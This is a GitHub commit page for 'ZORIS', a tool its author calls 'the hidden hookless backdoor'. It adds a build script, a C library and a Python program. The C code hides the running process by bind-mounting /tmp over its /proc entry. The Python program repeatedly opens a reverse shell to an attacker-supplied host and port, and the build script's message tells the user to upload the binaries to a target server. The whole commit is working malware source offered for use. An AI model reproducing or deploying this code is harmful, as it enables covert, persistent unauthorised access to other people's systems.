Skip to content

Commit

Permalink
Add files via upload
Browse files Browse the repository at this point in the history
  • Loading branch information
@brosck
brosck authored Mar 22, 2022
1 parent 3c271af commit 8724bb7
Show file tree
Hide file tree
Showing 6 changed files with 197 additions and 0 deletions.
7 changes: 7 additions & 0 deletions Makefile
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,7 @@
CC = gcc

all:
$(CC) -fPIC -shared hidden.c -o hidden.so

clean:
rm *.so
73 changes: 73 additions & 0 deletions build.sh
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,73 @@
#!/bin/sh

banner() {
printf "\033[0;36m
.
oN0. .OK:
,0X0. .kNK.
.xKKO .:ok0Oxl:lxOOkd:. .dXNd
:0KKk 'cxk0KXNX0OOKKNNXKOc. .dKWX,
.o000O: .:dkO00KKXNNX0KKKWNNNNX0x:. .c0KNNo
.okO0Ox, ..':dkO0KKKKK00KXNNNKKKXXNNWNXK0x:'.. .cOKXKKx.
.lxO0OkkOOOOO000KKKK000KKNNNWMMWWNKKKXNNXXXXKKKK000NXXKd.
:xkkO0000KKKK00OOkkkk00KKXNWMWXKK0O000XNNWWNXKKKXXX0c
;dxxxxkkkO0Okkkxxxkk00KKXWMMWNXXX0OOOO0KXK0OOOOOOk;
..',;:clxxdocodOOkOKKKXNNNNXKXNX0dldkkkdlc:;,'.
.;::::;:okOkkO0KKXXXKKKKKKOd;:cll:.
.:lccccc:::lokk0KKKXXXKKKK0OOollooddd:
.loolllcc;,:lodk0KKKXXKKKKXXOo:odddxxkkl
.cc:;'.. .:lodOKKKXKKKKKXKo ..,;cool
.codk00KKXKKXX0k.
,cdk0KKNWXKXXO:
'dkOKKXWMWNXKO.
ck00O0KKXK0KKX:
.:oxxxkOkkkxo;
.,:clc:,.
\033[0;36m[\033[0;37mZORIS - The hidden hookless backdoor\033[0;36m]
\033[0;36m[\033[0;37mDeveloped by MrEmpy\033[0;36m]\n\n"
}

requirements() {
OS=$(lsb_release -si)
if [ "$OS" = "Arch" ]; then
pacman -S python python-pip devtools patchelf locate
pip install pyinstaller
pip install staticx
elif [ "$OS" = "Debian" ]; then
apt-get install python3 python3-pip build-essential locate -y
apt install patchelf binutils -y
pip install pyinstaller
pip install staticx
else
apt-get install python3 python3-pip build-essential locate -y
apt install patchelf binutils -y
pip install pyinstaller
pip install staticx
fi

}

main() {
LIBPYTHON=$(locate "libpython" | grep "lib/libpython3.[0-9][0-9].so" -m 1)

printf '\n\033[0;34m[*] \033[0;37mInstalling requirements\n'
requirements
printf '\n\033[0;34m[*] \033[0;37mCompiling...\n'
gcc -fPIC -shared hidden.c -o hidden.so
pyinstaller --clean --onefile --add-binary="$LIBPYTHON.1.0:." zoris.py
mv dist bin
mv hidden.so bin
rm -rf build zoris.spec __pycache__/ 2>/dev/null
#mv bin/zoris bin/zoris.tmp
#staticx bin/zoris.tmp bin/zoris
#rm bin/zoris.tmp
printf '\n\n\033[0;32m[+] \033[0;37mSuccessfully compiled! The files are in the bin directory, upload them to the target server and run the zoris binary.\n'
}

if [[ $EUID -ne 0 ]]; then
printf "\033[0;34m[*] \033[0;37mPlease run as root"
banner
exit
fi
main
30 changes: 30 additions & 0 deletions hidden.c
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,30 @@
#include <stdio.h>
#include <string.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>

int get_pid() {
pid_t current_pid = getpid();
char proc_p[6] = "/proc/";
FILE* pid_file;
pid_file = fopen("pid.txt", "a");
fprintf(pid_file, "%s", proc_p);
fprintf(pid_file, "%lu", current_pid);
fclose(pid_file);
return 0;
}

int mount_pid() {
FILE* pid_f;
char pid_str[16];
pid_f = fopen("pid.txt", "r");
fscanf(pid_f, "%s", pid_str);
int mount_result = mount("/tmp", pid_str, "tmpfs", MS_BIND, NULL);
if (mount_result == 0) {
return 0;
} else {
return 1;
}
}
Binary file added static/x86_64/hidden.so
View file
Binary file not shown.
Binary file added static/x86_64/zoris
View file
Binary file not shown.
87 changes: 87 additions & 0 deletions zoris.py
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,87 @@
#/usr/bin/env python3
import socket
import subprocess
import os
import pty
import random
import time
import threading
from multiprocessing import Process
from ctypes import *
import argparse

tempo_sleep = 5
hidden = CDLL(f'{os.getcwd()}/hidden.so')
pid = os.getpid() - 1

def banner():
print("""\033[0;36m
.
oN0. .OK:
,0X0. .kNK.
.xKKO .:ok0Oxl:lxOOkd:. .dXNd
:0KKk 'cxk0KXNX0OOKKNNXKOc. .dKWX,
.o000O: .:dkO00KKXNNX0KKKWNNNNX0x:. .c0KNNo
.okO0Ox, ..':dkO0KKKKK00KXNNNKKKXXNNWNXK0x:'.. .cOKXKKx.
.lxO0OkkOOOOO000KKKK000KKNNNWMMWWNKKKXNNXXXXKKKK000NXXKd.
:xkkO0000KKKK00OOkkkk00KKXNWMWXKK0O000XNNWWNXKKKXXX0c
;dxxxxkkkO0Okkkxxxkk00KKXWMMWNXXX0OOOO0KXK0OOOOOOk;
..',;:clxxdocodOOkOKKKXNNNNXKXNX0dldkkkdlc:;,'.
.;::::;:okOkkO0KKXXXKKKKKKOd;:cll:.
.:lccccc:::lokk0KKKXXXKKKK0OOollooddd:
.loolllcc;,:lodk0KKKXXKKKKXXOo:odddxxkkl
.cc:;'.. .:lodOKKKXKKKKKXKo ..,;cool
.codk00KKXKKXX0k.
,cdk0KKNWXKXXO:
'dkOKKXWMWNXKO.
ck00O0KKXK0KKX:
.:oxxxkOkkkxo;
.,:clc:,.
\033[0;36m[\033[0;37mZORIS - The hidden hookless backdoor\033[0;36m]
\033[0;36m[\033[0;37mDeveloped by MrEmpy\033[0;36m]\033[0;37m\n""")

def rev_shell():
try:
hidden.get_pid()
hidden.mount_pid()
os.remove('pid.txt')
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((arguments.rhost, int(arguments.rport)))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
pty.spawn('sh')

except:
return

def main():
hidden.get_pid()
hidden.mount_pid()
open('pid.txt', 'a')
pid_f = open('pid.txt', 'w')
pid_f.write('/proc/{}'.format(pid))
pid_f.close()
hidden.mount_pid()
os.remove('pid.txt')
print('\033[0;32m[+]\033[0;37m Backdoor started')
while True:
thread_ids = []
for i in range(0, 7):
time.sleep(tempo_sleep)
new_thread = Process(target=rev_shell)
new_thread.start()
thread_ids.append(new_thread)

if __name__ == '__main__':
if os.geteuid() != 0:
banner()
print('\033[0;31m[!]\033[0;37m Please run as root')
else:
banner()
parser = argparse.ArgumentParser()
parser.add_argument('-rh','--host', action='store', help='Attacker host', dest='rhost', required=True)
parser.add_argument('-rp','--port', action='store', help='Attacker port', dest='rport', required=True)
arguments = parser.parse_args()
main()

0 comments on commit 8724bb7

Please sign in to comment.